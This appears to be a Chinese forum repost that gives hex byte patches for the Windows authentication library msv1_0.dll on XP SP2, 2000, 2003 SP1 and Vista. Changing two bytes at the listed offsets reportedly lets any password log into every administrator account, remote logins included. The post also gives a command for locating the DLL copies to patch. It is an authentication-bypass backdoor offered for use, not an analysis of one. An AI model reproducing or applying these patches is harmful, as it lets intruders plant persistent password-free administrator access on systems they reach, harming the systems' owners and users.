我注:Win2003 CN SP1 测试通过,管理员任意密码可以进入(重启了一下)
估计是类似注册码暴力破解,关键跳转改了一下。

from:http://1v1.name/

这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上..

system32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D

2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF

vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D

都是前两个字节改为
E0 00

全部管理员帐号无须密码登陆
包括远程登陆的

改两个目录的 msv1_0.dll 用16进制

dir /s c:\windows\msv1_0.dll